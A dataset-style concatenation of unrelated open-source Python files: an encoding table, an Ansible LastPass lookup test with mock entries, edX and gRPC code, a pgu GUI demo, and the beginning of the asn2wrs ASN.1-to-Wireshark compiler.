0x255f: 0x00c7, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x2560: 0x00cc, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x2561: 0x00b5, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x2562: 0x00b6, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x2563: 0x00b9, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x2564: 0x00d1, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x2565: 0x00d2, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x2566: 0x00cb, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x2567: 0x00cf, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x2568: 0x00d0, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x2569: 0x00ca, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x256a: 0x00d8, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x256b: 0x00d7, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x256c: 0x00ce, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x2580: 0x00df, # UPPER HALF BLOCK
0x2584: 0x00dc, # LOWER HALF BLOCK
0x2588: 0x00db, # FULL BLOCK
0x258c: 0x00dd, # LEFT HALF BLOCK
0x2590: 0x00de, # RIGHT HALF BLOCK
0x2591: 0x00b0, # LIGHT SHADE
0x2592: 0x00b1, # MEDIUM SHADE
0x2593: 0x00b2, # DARK SHADE
0x25a0: 0x00fe, # BLACK SQUARE
}
| Microvellum/Fluid-Designer | win64-vc/2.78/python/lib/encodings/cp437.py | Python | gpl-3.0 | 34,564 |
# (c)2016 Andrew Zenk <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from argparse import ArgumentParser
from units.compat import unittest
from units.compat.mock import patch
from ansible.errors import AnsibleError
from ansible.module_utils import six
from ansible.plugins.lookup.lastpass import LookupModule, LPass, LPassException
MOCK_ENTRIES = [{'username': 'user',
'name': 'Mock Entry',
'password': 't0pS3cret passphrase entry!',
'url': 'https://localhost/login',
'notes': 'Test\nnote with multiple lines.\n',
'id': '0123456789'}]
class MockLPass(LPass):
_mock_logged_out = False
_mock_disconnected = False
def _lookup_mock_entry(self, key):
for entry in MOCK_ENTRIES:
if key == entry['id'] or key == entry['name']:
return entry
def _run(self, args, stdin=None, expected_rc=0):
# Mock behavior of lpass executable
base_options = ArgumentParser(add_help=False)
base_options.add_argument('--color', default="auto", choices=['auto', 'always', 'never'])
p = ArgumentParser()
sp = p.add_subparsers(help='command', dest='subparser_name')
logout_p = sp.add_parser('logout', parents=[base_options], help='logout')
show_p = sp.add_parser('show', parents=[base_options], help='show entry details')
field_group = show_p.add_mutually_exclusive_group(required=True)
for field in MOCK_ENTRIES[0].keys():
field_group.add_argument("--{0}".format(field), default=False, action='store_true')
field_group.add_argument('--field', default=None)
show_p.add_argument('selector', help='Unique Name or ID')
args = p.parse_args(args)
def mock_exit(output='', error='', rc=0):
if rc != expected_rc:
raise LPassException(error)
return output, error
if args.color != 'never':
return mock_exit(error='Error: Mock only supports --color=never', rc=1)
if args.subparser_name == 'logout':
if self._mock_logged_out:
return mock_exit(error='Error: Not currently logged in', rc=1)
logged_in_error = 'Are you sure you would like to log out? [Y/n]'
if stdin and stdin.lower() == 'n\n':
return mock_exit(output='Log out: aborted.', error=logged_in_error, rc=1)
elif stdin and stdin.lower() == 'y\n':
return mock_exit(output='Log out: complete.', error=logged_in_error, rc=0)
else:
return mock_exit(error='Error: aborted response', rc=1)
if args.subparser_name == 'show':
if self._mock_logged_out:
return mock_exit(error='Error: Could not find decryption key.' +
' Perhaps you need to login with `lpass login`.', rc=1)
if self._mock_disconnected:
return mock_exit(error='Error: Couldn\'t resolve host name.', rc=1)
mock_entry = self._lookup_mock_entry(args.selector)
if args.field:
return mock_exit(output=mock_entry.get(args.field, ''))
elif args.password:
return mock_exit(output=mock_entry.get('password', ''))
elif args.username:
return mock_exit(output=mock_entry.get('username', ''))
elif args.url:
return mock_exit(output=mock_entry.get('url', ''))
elif args.name:
return mock_exit(output=mock_entry.get('name', ''))
elif args.id:
return mock_exit(output=mock_entry.get('id', ''))
elif args.notes:
return mock_exit(output=mock_entry.get('notes', ''))
raise LPassException('We should never get here')
class DisconnectedMockLPass(MockLPass):
_mock_disconnected = True
class LoggedOutMockLPass(MockLPass):
_mock_logged_out = True
class TestLPass(unittest.TestCase):
def test_lastpass_cli_path(self):
lp = MockLPass(path='/dev/null')
self.assertEqual('/dev/null', lp.cli_path)
def test_lastpass_build_args_logout(self):
lp = MockLPass()
self.assertEqual(['logout', '--color=never'], lp._build_args("logout"))
def test_lastpass_logged_in_true(self):
lp = MockLPass()
self.assertTrue(lp.logged_in)
def test_lastpass_logged_in_false(self):
lp = LoggedOutMockLPass()
self.assertFalse(lp.logged_in)
def test_lastpass_show_disconnected(self):
lp = DisconnectedMockLPass()
with self.assertRaises(LPassException):
lp.get_field('0123456789', 'username')
def test_lastpass_show(self):
lp = MockLPass()
for entry in MOCK_ENTRIES:
entry_id = entry.get('id')
for k, v in six.iteritems(entry):
self.assertEqual(v.strip(), lp.get_field(entry_id, k))
class TestLastpassPlugin(unittest.TestCase):
@patch('ansible.plugins.lookup.lastpass.LPass', new=MockLPass)
def test_lastpass_plugin_normal(self):
lookup_plugin = LookupModule()
for entry in MOCK_ENTRIES:
entry_id = entry.get('id')
for k, v in six.iteritems(entry):
self.assertEqual(v.strip(),
lookup_plugin.run([entry_id], field=k)[0])
@patch('ansible.plugins.lookup.lastpass.LPass', LoggedOutMockLPass)
def test_lastpass_plugin_logged_out(self):
lookup_plugin = LookupModule()
entry = MOCK_ENTRIES[0]
entry_id = entry.get('id')
with self.assertRaises(AnsibleError):
lookup_plugin.run([entry_id], field='password')
@patch('ansible.plugins.lookup.lastpass.LPass', DisconnectedMockLPass)
def test_lastpass_plugin_disconnected(self):
lookup_plugin = LookupModule()
entry = MOCK_ENTRIES[0]
entry_id = entry.get('id')
with self.assertRaises(AnsibleError):
lookup_plugin.run([entry_id], field='password')
| roadmapper/ansible | test/units/plugins/lookup/test_lastpass.py | Python | gpl-3.0 | 6,829 |
"""
Tests for course_info
"""
from django.test.utils import override_settings
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase
from xmodule.modulestore.tests.factories import CourseFactory
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from courseware.tests.factories import UserFactory
from courseware.tests.tests import TEST_DATA_MONGO_MODULESTORE
@override_settings(MODULESTORE=TEST_DATA_MONGO_MODULESTORE)
class TestVideoOutline(ModuleStoreTestCase, APITestCase):
"""
Tests for /api/mobile/v0.5/course_info/...
"""
def setUp(self):
super(TestVideoOutline, self).setUp()
self.user = UserFactory.create()
self.course = CourseFactory.create(mobile_available=True)
self.client.login(username=self.user.username, password='test')
def test_about(self):
url = reverse('course-about-detail', kwargs={'course_id': unicode(self.course.id)})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertTrue('overview' in response.data) # pylint: disable=E1103
def test_handouts(self):
url = reverse('course-handouts-list', kwargs={'course_id': unicode(self.course.id)})
response = self.client.get(url)
self.assertEqual(response.status_code, 404)
def test_updates(self):
url = reverse('course-updates-list', kwargs={'course_id': unicode(self.course.id)})
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data, []) # pylint: disable=E1103
# TODO: add handouts and updates, somehow
| c0710204/edx-platform | lms/djangoapps/mobile_api/course_info/tests.py | Python | agpl-3.0 | 1,679 |
def main():
with open('file.txt'):
print(42) | smmribeiro/intellij-community | python/testData/quickFixes/PyRemoveUnusedLocalQuickFixTest/withOneTarget_after.py | Python | apache-2.0 | 56 |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""GRPCAuthMetadataPlugins for standard authentication."""
import inspect
from concurrent import futures
import grpc
def _sign_request(callback, token, error):
metadata = (('authorization', 'Bearer {}'.format(token)),)
callback(metadata, error)
def _create_get_token_callback(callback):
def get_token_callback(future):
try:
access_token = future.result().access_token
except Exception as exception: # pylint: disable=broad-except
_sign_request(callback, None, exception)
else:
_sign_request(callback, access_token, None)
return get_token_callback
class GoogleCallCredentials(grpc.AuthMetadataPlugin):
"""Metadata wrapper for GoogleCredentials from the oauth2client library."""
def __init__(self, credentials):
self._credentials = credentials
self._pool = futures.ThreadPoolExecutor(max_workers=1)
# Hack to determine if these are JWT creds and we need to pass
# additional_claims when getting a token
self._is_jwt = 'additional_claims' in inspect.getargspec(
credentials.get_access_token).args
def __call__(self, context, callback):
# MetadataPlugins cannot block (see grpc.beta.interfaces.py)
if self._is_jwt:
future = self._pool.submit(
self._credentials.get_access_token,
additional_claims={'aud': context.service_url})
else:
future = self._pool.submit(self._credentials.get_access_token)
future.add_done_callback(_create_get_token_callback(callback))
def __del__(self):
self._pool.shutdown(wait=False)
class AccessTokenCallCredentials(grpc.AuthMetadataPlugin):
"""Metadata wrapper for raw access token credentials."""
def __init__(self, access_token):
self._access_token = access_token
def __call__(self, context, callback):
_sign_request(callback, self._access_token, None)
| quizlet/grpc | src/python/grpcio/grpc/_auth.py | Python | apache-2.0 | 2,543 |
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
from __future__ import absolute_import
from . import _bigquery
__all__ = ['_bigquery']
| jdanbrown/pydatalab | google/datalab/bigquery/commands/__init__.py | Python | apache-2.0 | 679 |
"""Tables, Widgets, and Groups!
An example of tables and most of the included widgets.
"""
import pygame
from pygame.locals import *
# the following line is not needed if pgu is installed
import sys; sys.path.insert(0, "..")
from pgu import gui
# Load an alternate theme to show how it is done. You can also
# specify a path (absolute or relative) to your own custom theme:
#
# app = gui.Desktop(theme=gui.Theme("path/to/theme"))
#
app = gui.Desktop()
app.connect(gui.QUIT,app.quit,None)
##The table code is entered much like HTML.
##::
c = gui.Table()
c.tr()
c.td(gui.Label("Gui Widgets"),colspan=4)
def cb():
print("Clicked!")
btn = gui.Button("Click Me!")
btn.connect(gui.CLICK, cb)
c.tr()
c.td(gui.Label("Button"))
c.td(btn,colspan=3)
##
c.tr()
c.td(gui.Label("Switch"))
c.td(gui.Switch(False),colspan=3)
c.tr()
c.td(gui.Label("Checkbox"))
##Note how Groups are used for Radio buttons, Checkboxes, and Tools.
##::
g = gui.Group(value=[1,3])
c.td(gui.Checkbox(g,value=1))
c.td(gui.Checkbox(g,value=2))
c.td(gui.Checkbox(g,value=3))
##
c.tr()
c.td(gui.Label("Radio"))
g = gui.Group()
c.td(gui.Radio(g,value=1))
c.td(gui.Radio(g,value=2))
c.td(gui.Radio(g,value=3))
c.tr()
c.td(gui.Label("Select"))
e = gui.Select()
e.add("Goat",'goat')
e.add("Horse",'horse')
e.add("Dog",'dog')
e.add("Pig",'pig')
c.td(e,colspan=3)
c.tr()
c.td(gui.Label("Tool"))
g = gui.Group(value='b')
c.td(gui.Tool(g,gui.Label('A'),value='a'))
c.td(gui.Tool(g,gui.Label('B'),value='b'))
c.td(gui.Tool(g,gui.Label('C'),value='c'))
c.tr()
c.td(gui.Label("Input"))
def cb():
print("Input received")
w = gui.Input(value='Cuzco',size=8)
w.connect("activate", cb)
c.td(w,colspan=3)
c.tr()
c.td(gui.Label("Slider"))
c.td(gui.HSlider(value=23,min=0,max=100,size=20,width=120),colspan=3)
c.tr()
c.td(gui.Label("Keysym"))
c.td(gui.Keysym(),colspan=3)
c.tr()
c.td(gui.Label("Text Area"), colspan=4, align=-1)
c.tr()
c.td(gui.TextArea(value="Cuzco the Goat", width=150, height=70), colspan=4)
app.run(c)
| danstoner/python_experiments | pgu/examples/gui5.py | Python | gpl-2.0 | 1,996 |
# simple __init__.py
from .pidSVG import *
| ptosco/rdkit | rdkit/sping/SVG/__init__.py | Python | bsd-3-clause | 44 |
#!/usr/bin/env python
#
# asn2wrs.py
# ASN.1 to Wireshark dissector compiler
# Copyright 2004 Tomas Kukosa
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, provided that the above
# copyright notice(s) and this permission notice appear in all copies of
# the Software and that both the above copyright notice(s) and this
# permission notice appear in supporting documentation.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
# OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
# INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
# FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
# WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
# Except as contained in this notice, the name of a copyright holder
# shall not be used in advertising or otherwise to promote the sale, use
# or other dealings in this Software without prior written authorization
# of the copyright holder.
"""ASN.1 to Wireshark dissector compiler"""
#
# Compiler from ASN.1 specification to the Wireshark dissector
#
# Based on ASN.1 to Python compiler from Aaron S. Lav's PyZ3950 package licensed under the X Consortium license
# http://www.pobox.com/~asl2/software/PyZ3950/
# (ASN.1 to Python compiler functionality is broken but not removed, it could be revived if necessary)
#
# It requires Dave Beazley's PLY parsing package licensed under the LGPL (tested with version 2.3)
# http://www.dabeaz.com/ply/
#
#
# ITU-T Recommendation X.680 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Specification of basic notation
#
# ITU-T Recommendation X.681 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Information object specification
#
# ITU-T Recommendation X.682 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Constraint specification
#
# ITU-T Recommendation X.683 (07/2002),
# Information technology - Abstract Syntax Notation One (ASN.1): Parameterization of ASN.1 specifications
#
# ITU-T Recommendation X.880 (07/1994),
# Information technology - Remote Operations: Concepts, model and notation
#
import warnings
import re
import sys
import os
import os.path
import time
import getopt
import traceback
import lex
import yacc
if sys.version_info[0] < 3:
from string import maketrans
# OID name -> number conversion table
oid_names = {
'/itu-t' : 0,
'/itu' : 0,
'/ccitt' : 0,
'/itu-r' : 0,
'0/recommendation' : 0,
'0.0/a' : 1,
'0.0/b' : 2,
'0.0/c' : 3,
'0.0/d' : 4,
'0.0/e' : 5,
'0.0/f' : 6,
'0.0/g' : 7,
'0.0/h' : 8,
'0.0/i' : 9,
'0.0/j' : 10,
'0.0/k' : 11,
'0.0/l' : 12,
'0.0/m' : 13,
'0.0/n' : 14,
'0.0/o' : 15,
'0.0/p' : 16,
'0.0/q' : 17,
'0.0/r' : 18,
'0.0/s' : 19,
'0.0/t' : 20,
'0.0/tseries' : 20,
'0.0/u' : 21,
'0.0/v' : 22,
'0.0/w' : 23,
'0.0/x' : 24,
'0.0/y' : 25,
'0.0/z' : 26,
'0/question' : 1,
'0/administration' : 2,
'0/network-operator' : 3,
'0/identified-organization' : 4,
'0/r-recommendation' : 5,
'0/data' : 9,
'/iso' : 1,
'1/standard' : 0,
'1/registration-authority' : 1,
'1/member-body' : 2,
'1/identified-organization' : 3,
'/joint-iso-itu-t' : 2,
'/joint-iso-ccitt' : 2,
'2/presentation' : 0,
'2/asn1' : 1,
'2/association-control' : 2,
'2/reliable-transfer' : 3,
'2/remote-operations' : 4,
'2/ds' : 5,
'2/directory' : 5,
'2/mhs' : 6,
'2/mhs-motis' : 6,
'2/ccr' : 7,
'2/oda' : 8,
'2/ms' : 9,
'2/osi-management' : 9,
'2/transaction-processing' : 10,
'2/dor' : 11,
'2/distinguished-object-reference' : 11,
'2/reference-data-transfe' : 12,
'2/network-layer' : 13,
'2/network-layer-management' : 13,
'2/transport-layer' : 14,
'2/transport-layer-management' : 14,
'2/datalink-layer' : 15,
'2/datalink-layer-managemen' : 15,
'2/datalink-layer-management-information' : 15,
'2/country' : 16,
'2/registration-procedures' : 17,
'2/registration-procedure' : 17,
'2/physical-layer' : 18,
'2/physical-layer-management' : 18,
'2/mheg' : 19,
'2/genericULS' : 20,
'2/generic-upper-layers-security' : 20,
'2/guls' : 20,
'2/transport-layer-security-protocol' : 21,
'2/network-layer-security-protocol' : 22,
'2/international-organizations' : 23,
'2/internationalRA' : 23,
'2/sios' : 24,
'2/uuid' : 25,
'2/odp' : 26,
'2/upu' : 40,
}
ITEM_FIELD_NAME = '_item'
UNTAG_TYPE_NAME = '_untag'
def asn2c(id):
return id.replace('-', '_').replace('.', '_').replace('&', '_')
input_file = None
g_conform = None
lexer = None
in_oid = False
class LexError(Exception):
def __init__(self, tok, filename=None):
self.tok = tok
self.filename = filename
self.msg = "Unexpected character %r" % (self.tok.value[0])
Exception.__init__(self, self.msg)
def __repr__(self):
return "%s:%d: %s" % (self.filename, self.tok.lineno, self.msg)
__str__ = __repr__
class ParseError(Exception):
def __init__(self, tok, filename=None):
self.tok = tok
self.filename = filename
self.msg = "Unexpected token %s(%r)" % (self.tok.type, self.tok.value)
Exception.__init__(self, self.msg)
def __repr__(self):
return "%s:%d: %s" % (self.filename, self.tok.lineno, self.msg)
__str__ = __repr__
class DuplicateError(Exception):
def __init__(self, type, ident):
self.type = type
self.ident = ident
self.msg = "Duplicate %s for %s" % (self.type, self.ident)
Exception.__init__(self, self.msg)
def __repr__(self):
return self.msg
__str__ = __repr__
class CompError(Exception):
def __init__(self, msg):
self.msg = msg
Exception.__init__(self, self.msg)
def __repr__(self):
return self.msg
__str__ = __repr__
states = (
('braceignore','exclusive'),
)
precedence = (
('left', 'UNION', 'BAR'),
('left', 'INTERSECTION', 'CIRCUMFLEX'),
)
# 11 ASN.1 lexical items
static_tokens = {
r'::=' : 'ASSIGNMENT', # 11.16 Assignment lexical item
r'\.\.' : 'RANGE', # 11.17 Range separator
r'\.\.\.' : 'ELLIPSIS', # 11.18 Ellipsis
r'\[\[' : 'LVERBRACK', # 11.19 Left version brackets
r'\]\]' : 'RVERBRACK', # 11.20 Right version brackets
# 11.26 Single character lexical items
r'\{' : 'LBRACE',
r'\}' : 'RBRACE',
r'<' : 'LT',
#r'>' : 'GT',
r',' : 'COMMA',
r'\.' : 'DOT',
r'\(' : 'LPAREN',
r'\)' : 'RPAREN',
r'\[' : 'LBRACK',
r'\]' : 'RBRACK',
r'-' : 'MINUS',
r':' : 'COLON',
#r'=' : 'EQ',
#r'"' : 'QUOTATION',
#r"'" : 'APOSTROPHE',
r';' : 'SEMICOLON',
r'@' : 'AT',
r'\!' : 'EXCLAMATION',
r'\^' : 'CIRCUMFLEX',
r'\&' : 'AMPERSAND',
r'\|' : 'BAR'
}
# 11.27 Reserved words
# all keys in reserved_words must start w/ upper case
reserved_words = {
'ABSENT' : 'ABSENT',
'ABSTRACT-SYNTAX' : 'ABSTRACT_SYNTAX',
'ALL' : 'ALL',
'APPLICATION' : 'APPLICATION',
'AUTOMATIC' : 'AUTOMATIC',
'BEGIN' : 'BEGIN',
'BIT' : 'BIT',
'BOOLEAN' : 'BOOLEAN',
'BY' : 'BY',
'CHARACTER' : 'CHARACTER',
'CHOICE' : 'CHOICE',
'CLASS' : 'CLASS',
'COMPONENT' : 'COMPONENT',
'COMPONENTS' : 'COMPONENTS',
'CONSTRAINED' : 'CONSTRAINED',
'CONTAINING' : 'CONTAINING',
'DEFAULT' : 'DEFAULT',
'DEFINITIONS' : 'DEFINITIONS',
'EMBEDDED' : 'EMBEDDED',
# 'ENCODED' : 'ENCODED',
'END' : 'END',
'ENUMERATED' : 'ENUMERATED',
# 'EXCEPT' : 'EXCEPT',
'EXPLICIT' : 'EXPLICIT',
'EXPORTS' : 'EXPORTS',
# 'EXTENSIBILITY' : 'EXTENSIBILITY',
'EXTERNAL' : 'EXTERNAL',
'FALSE' : 'FALSE',
'FROM' : 'FROM',
'GeneralizedTime' : 'GeneralizedTime',
'IDENTIFIER' : 'IDENTIFIER',
'IMPLICIT' : 'IMPLICIT',
# 'IMPLIED' : 'IMPLIED',
'IMPORTS' : 'IMPORTS',
'INCLUDES' : 'INCLUDES',
'INSTANCE' : 'INSTANCE',
'INTEGER' : 'INTEGER',
'INTERSECTION' : 'INTERSECTION',
'MAX' : 'MAX',
'MIN' : 'MIN',
'MINUS-INFINITY' : 'MINUS_INFINITY',
'NULL' : 'NULL',
'OBJECT' : 'OBJECT',
'ObjectDescriptor' : 'ObjectDescriptor',
'OCTET' : 'OCTET',
'OF' : 'OF',
'OPTIONAL' : 'OPTIONAL',
'PATTERN' : 'PATTERN',
'PDV' : 'PDV',
'PLUS-INFINITY' : 'PLUS_INFINITY',
'PRESENT' : 'PRESENT',
'PRIVATE' : 'PRIVATE',
'REAL' : 'REAL',
'RELATIVE-OID' : 'RELATIVE_OID',
'SEQUENCE' : 'SEQUENCE',
'SET' : 'SET',
'SIZE' : 'SIZE',
'STRING' : 'STRING',
'SYNTAX' : 'SYNTAX',
'TAGS' : 'TAGS',
'TRUE' : 'TRUE',
'TYPE-IDENTIFIER' : 'TYPE_IDENTIFIER',
'UNION' : 'UNION',
'UNIQUE' : 'UNIQUE',
'UNIVERSAL' : 'UNIVERSAL',
'UTCTime' : 'UTCTime',
'WITH' : 'WITH',
# X.208 obsolete but still used
'ANY' : 'ANY',
'DEFINED' : 'DEFINED',
}
for k in list(static_tokens.keys()):
if static_tokens [k] == None:
static_tokens [k] = k
StringTypes = ['Numeric', 'Printable', 'IA5', 'BMP', 'Universal', 'UTF8',
'Teletex', 'T61', 'Videotex', 'Graphic', 'ISO646', 'Visible',
'General']
for s in StringTypes:
reserved_words[s + 'String'] = s + 'String'
tokens = list(static_tokens.values()) \
+ list(reserved_words.values()) \
+ ['BSTRING', 'HSTRING', 'QSTRING',
'UCASE_IDENT', 'LCASE_IDENT', 'LCASE_IDENT_ASSIGNED', 'CLASS_IDENT',
'REAL_NUMBER', 'NUMBER', 'PYQUOTE']
cur_mod = __import__ (__name__) # XXX blech!
for (k, v) in list(static_tokens.items ()):
cur_mod.__dict__['t_' + v] = k
# 11.10 Binary strings
def t_BSTRING (t):
r"'[01]*'B"
return t
# 11.12 Hexadecimal strings
def t_HSTRING (t):
r"'[0-9A-Fa-f]*'H"
return t
def t_QSTRING (t):
r'"([^"]|"")*"'
return t
def t_UCASE_IDENT (t):
r"[A-Z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
if (is_class_ident(t.value)): t.type = 'CLASS_IDENT'
if (is_class_syntax(t.value)): t.type = t.value
t.type = reserved_words.get(t.value, t.type)
return t
lcase_ident_assigned = {}
def t_LCASE_IDENT (t):
r"[a-z](-[a-zA-Z0-9]|[a-zA-Z0-9])*" # can't end w/ '-'
if (not in_oid and (t.value in lcase_ident_assigned)): t.type = 'LCASE_IDENT_ASSIGNED'
return t
# 11.9 Real numbers
def t_REAL_NUMBER (t):
r"[0-9]+\.[0-9]*(?!\.)"
return t
# 11.8 Numbers
def t_NUMBER (t):
r"0|([1-9][0-9]*)"
return t
# 11.6 Comments
pyquote_str = 'PYQUOTE'
def t_COMMENT(t):
r"--(-[^\-\n]|[^\-\n])*(--|\n|-\n|$|-$)"
if (t.value.find("\n") >= 0) : t.lexer.lineno += 1
if t.value[2:2+len (pyquote_str)] == pyquote_str:
t.value = t.value[2+len(pyquote_str):]
t.value = t.value.lstrip ()
t.type = pyquote_str
return t
return None
t_ignore = " \t\r"
def t_NEWLINE(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_error(t):
global input_file
raise LexError(t, input_file)
# state 'braceignore'
def t_braceignore_lbrace(t):
r'\{'
t.lexer.level +=1
def t_braceignore_rbrace(t):
r'\}'
t.lexer.level -=1
# If closing brace, return token
if t.lexer.level == 0:
t.type = 'RBRACE'
return t
def t_braceignore_QSTRING (t):
r'"([^"]|"")*"'
t.lexer.lineno += t.value.count("\n")
def t_braceignore_COMMENT(t):
r"--(-[^\-\n]|[^\-\n])*(--|\n|-\n|$|-$)"
if (t.value.find("\n") >= 0) : t.lexer.lineno += 1
def t_braceignore_nonspace(t):
r'[^\s\{\}\"-]+|-(?!-)'
t_braceignore_ignore = " \t\r"
def t_braceignore_NEWLINE(t):
r'\n+'
t.lexer.lineno += t.value.count("\n")
def t_braceignore_error(t):
t.lexer.skip(1)
class Ctx:
def __init__ (self, defined_dict, indent = 0):
self.tags_def = 'EXPLICIT' # default = explicit
self.indent_lev = 0
self.assignments = {}
self.dependencies = {}
self.pyquotes = []
self.defined_dict = defined_dict
self.name_ctr = 0
def spaces (self):
return " " * (4 * self.indent_lev)
def indent (self):
self.indent_lev += 1
def outdent (self):
self.indent_lev -= 1
assert (self.indent_lev >= 0)
def register_assignment (self, ident, val, dependencies):
if ident in self.assignments:
raise DuplicateError("assignment", ident)
if ident in self.defined_dict:
raise Exception("cross-module duplicates for %s" % ident)
self.defined_dict [ident] = 1
self.assignments[ident] = val
self.dependencies [ident] = dependencies
return ""
# return "#%s depends on %s" % (ident, str (dependencies))
def register_pyquote (self, val):
self.pyquotes.append (val)
return ""
def output_assignments (self):
already_output = {}
text_list = []
assign_keys = list(self.assignments.keys())
to_output_count = len (assign_keys)
while True:
any_output = 0
for (ident, val) in list(self.assignments.items ()):
if ident in already_output:
continue
ok = 1
for d in self.dependencies [ident]:
if ((d not in already_output) and
(d in assign_keys)):
ok = 0
if ok:
text_list.append ("%s=%s" % (ident,
self.assignments [ident]))
already_output [ident] = 1
any_output = 1
to_output_count -= 1
assert (to_output_count >= 0)
if not any_output:
if to_output_count == 0:
break
# OK, we detected a cycle
cycle_list = []
for ident in list(self.assignments.keys ()):
if ident not in already_output:
depend_list = [d for d in self.dependencies[ident] if d in assign_keys]
cycle_list.append ("%s(%s)" % (ident, ",".join (depend_list)))
text_list.append ("# Cycle XXX " + ",".join (cycle_list))
for (ident, val) in list(self.assignments.items ()):
if ident not in already_output:
text_list.append ("%s=%s" % (ident, self.assignments [ident]))
break
return "\n".join (text_list)
def output_pyquotes (self):
return "\n".join (self.pyquotes)
def make_new_name (self):
self.name_ctr += 1
return "_compiler_generated_name_%d" % (self.name_ctr,)
#--- Flags for EXPORT, USER_DEFINED, NO_EMIT, MAKE_ENUM -------------------------------
EF_TYPE = 0x0001
EF_VALS = 0x0002
EF_ENUM = 0x0004
EF_WS_DLL = 0x0010 # exported from shared library
EF_EXTERN = 0x0020
EF_NO_PROT = 0x0040
EF_NO_TYPE = 0x0080
EF_UCASE = 0x0100
EF_TABLE = 0x0400
EF_DEFINE = 0x0800
EF_MODULE = 0x1000
#--- common dependency computation ---
# Input : list of items
# dictionary with lists of dependency
#
#
# Output : list of two outputs:
# [0] list of items in dependency
# [1] list of cycle dependency cycles
def dependency_compute(items, dependency, map_fn = lambda t: t, ignore_fn = lambda t: False):
item_ord = []
item_cyc = []
x = {} # already emitted
#print '# Dependency computation'
for t in items:
if map_fn(t) in x:
#print 'Continue: %s : %s' % (t, (map_fn(t))
continue
stack = [t]
stackx = {t : dependency.get(t, [])[:]}
#print 'Push: %s : %s' % (t, str(stackx[t]))
while stack:
if stackx[stack[-1]]: # has dependencies
d = stackx[stack[-1]].pop(0)
if map_fn(d) in x or ignore_fn(d):
continue
if d in stackx: # cyclic dependency
c = stack[:]
c.reverse()
c = [d] + c[0:c.index(d)+1]
c.reverse()
item_cyc.append(c)
#print 'Cyclic: %s ' % (' -> '.join(c))
continue
stack.append(d)
stackx[d] = dependency.get(d, [])[:]
#print 'Push: %s : %s' % (d, str(stackx[d]))
else:
#print 'Pop: %s' % (stack[-1])
del stackx[stack[-1]]
e = map_fn(stack.pop())
if e in x:
continue
#print 'Add: %s' % (e)
item_ord.append(e)
x[e] = True
return (item_ord, item_cyc)
# Given a filename, return a relative path from epan/dissectors
def rel_dissector_path(filename):
path_parts = os.path.abspath(filename).split(os.sep)
while (len(path_parts) > 3 and path_parts[0] != 'asn1'):
path_parts.pop(0)
path_parts.insert(0, '..')
path_parts.insert(0, '..')
return '/'.join(path_parts)
#--- EthCtx -------------------------------------------------------------------
class EthCtx:
